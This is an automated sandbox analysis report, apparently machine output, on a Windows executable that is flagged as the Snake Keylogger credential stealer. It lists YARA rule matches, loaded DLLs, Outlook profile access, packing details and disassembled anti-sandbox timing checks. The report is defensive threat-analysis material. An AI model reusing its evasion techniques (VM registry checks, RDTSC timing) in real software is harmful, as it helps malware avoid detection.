Source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/3

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Code function: 0_2_004019F0 OleInitialize,_getenv,CreateToolhelp32Snapshot,CloseHandle,_malloc,_memset,_memset,_malloc,_memset,LoadLibraryA,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,

0_2_004019F0

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Command line argument: 08A

0_2_00413780

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: x8M2g1Xxhz.exe, 00000000.00000003.1545692849.0000000005C6F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004DCE000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004E0D000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: x8M2g1Xxhz.exe	Virustotal: Detection: 59%
Source: x8M2g1Xxhz.exe	ReversingLabs: Detection: 87%

Source: x8M2g1Xxhz.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: x8M2g1Xxhz.exe

Static file information: File size 2841088 > 1048576

Source: x8M2g1Xxhz.exe

Static PE information: Raw size of tzvdltub is bigger than: 0x100000 < 0x27e800

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Unpacked PE file: 0.2.x8M2g1Xxhz.exe.400000.0.unpack :EW;.rsrc:W;.idata :W;tzvdltub:EW;dqypilex:EW; vs :ER;.rsrc:W;.idata :W;tzvdltub:EW;dqypilex:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: dqypilex

Source: x8M2g1Xxhz.exe	Static PE information: section name:
Source: x8M2g1Xxhz.exe	Static PE information: section name: .idata
Source: x8M2g1Xxhz.exe	Static PE information: section name: tzvdltub
Source: x8M2g1Xxhz.exe	Static PE information: section name: dqypilex

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043A042 push 76F90AE0h; mov dword ptr [esp], edx	0_2_0043A3A0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043A042 push edx; mov dword ptr [esp], eax	0_2_0043A809
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00611063 push 12D75310h; mov dword ptr [esp], ebp	0_2_00611077
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0067387E push edi; ret	0_2_0067388D
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00470802 push eax; mov dword ptr [esp], 06F5FC00h	0_2_0047086B
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00470802 push 1F639FDCh; mov dword ptr [esp], edx	0_2_0047092D
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00470802 push edx; mov dword ptr [esp], 7F3F88E6h	0_2_00470964
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043D018 push edx; mov dword ptr [esp], eax	0_2_0043D034
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043D018 push edi; mov dword ptr [esp], 3FCF247Ah	0_2_0043D040
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0060D803 push ebx; mov dword ptr [esp], 31CD9C01h	0_2_0060D834
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0060D803 push edi; mov dword ptr [esp], 26C8D451h	0_2_0060D87F
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0060D803 push ebp; mov dword ptr [esp], eax	0_2_0060D90A
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_006AB800 push ebx; mov dword ptr [esp], ecx	0_2_006AB841
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_006408EF push eax; mov dword ptr [esp], esi	0_2_0064091E
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043C8CD push edx; mov dword ptr [esp], eax	0_2_0043C8DC
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043C88A push 132BA8BDh; mov dword ptr [esp], edx	0_2_0043D486
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0062A883 push ebp; mov dword ptr [esp], esi	0_2_0062A8E3
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043C8A7 push ebp; mov dword ptr [esp], edx	0_2_0043C8AF
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043C8A7 push 1193CAACh; mov dword ptr [esp], esi	0_2_0043D12E
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_00423149 push eax; ret	0_2_00423179
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_0043B905 push ebp; mov dword ptr [esp], esi	0_2_0043B90B
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push ebx; mov dword ptr [esp], eax	0_2_005A112E
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push esi; mov dword ptr [esp], ebp	0_2_005A1157
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push eax; mov dword ptr [esp], edi	0_2_005A1197
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push edi; mov dword ptr [esp], edx	0_2_005A122A
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push eax; mov dword ptr [esp], 2F822171h	0_2_005A126B
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push edx; mov dword ptr [esp], esi	0_2_005A12B0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push 12F77D0Dh; mov dword ptr [esp], ebx	0_2_005A12C0
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push 115BFBDFh; mov dword ptr [esp], esi	0_2_005A12D2
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push ebp; mov dword ptr [esp], ecx	0_2_005A1306
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Code function: 0_2_005A110C push esi; mov dword ptr [esp], 0344E57Bh	0_2_005A13BB

Source: x8M2g1Xxhz.exe

Static PE information: section name: entropy: 7.0329103548795775

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A0C3B second address: 5A0C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E8594h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B43C4 second address: 5B43CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B46B4 second address: 5B46B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B4818 second address: 5B4822 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC218F099B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B4959 second address: 5B4975 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC2192E8596h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7D27 second address: 5B7DA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FC218F099C2h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FC218F099C1h 0x0000001a jbe 00007FC218F099B6h 0x00000020 popad 0x00000021 popad 0x00000022 nop 0x00000023 call 00007FC218F099BDh 0x00000028 or dword ptr [ebp+136331A5h], ebx 0x0000002e pop edx 0x0000002f push 00000000h 0x00000031 clc 0x00000032 push 31AB26D0h 0x00000037 pushad 0x00000038 jnc 00007FC218F099C1h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7DA8 second address: 5B7E09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 31AB2650h 0x0000000e xor edi, dword ptr [ebp+13632E05h] 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FC2192E8588h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov dword ptr [ebp+13632116h], ebx 0x00000036 mov edi, dword ptr [ebp+13632C1Ah] 0x0000003c mov ecx, 66CBEF03h 0x00000041 push 00000000h 0x00000043 or dword ptr [ebp+136331B4h], edi 0x00000049 push 00000003h 0x0000004b mov esi, dword ptr [ebp+13633091h] 0x00000051 push AC31A086h 0x00000056 pushad 0x00000057 push esi 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7E09 second address: 5B7E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7EBE second address: 5B7EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7EC2 second address: 5B7F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jl 00007FC218F099CCh 0x00000010 jmp 00007FC218F099C6h 0x00000015 push 00000000h 0x00000017 sbb di, 3652h 0x0000001c mov esi, dword ptr [ebp+13632758h] 0x00000022 push 3D505B41h 0x00000027 jc 00007FC218F099C9h 0x0000002d xor dword ptr [esp], 3D505BC1h 0x00000034 call 00007FC218F099C5h 0x00000039 pop ecx 0x0000003a push 00000003h 0x0000003c mov cx, dx 0x0000003f mov edi, dword ptr [ebp+13632EF1h] 0x00000045 push 00000000h 0x00000047 jnp 00007FC218F099C3h 0x0000004d push 00000003h 0x0000004f mov esi, dword ptr [ebp+13632F1Dh] 0x00000055 call 00007FC218F099B9h 0x0000005a push esi 0x0000005b pushad 0x0000005c jl 00007FC218F099B6h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7F6B second address: 5B7F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7F76 second address: 5B7FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jbe 00007FC218F099BCh 0x0000000d jg 00007FC218F099B6h 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007FC218F099BAh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007FC218F099B8h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7FA4 second address: 5B7FCC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2192E8594h 0x00000008 jmp 00007FC2192E858Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jg 00007FC2192E8586h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5B7FCC second address: 5B7FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A2687 second address: 5A268D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 5A268D second address: 5A26A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FC218F099BAh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
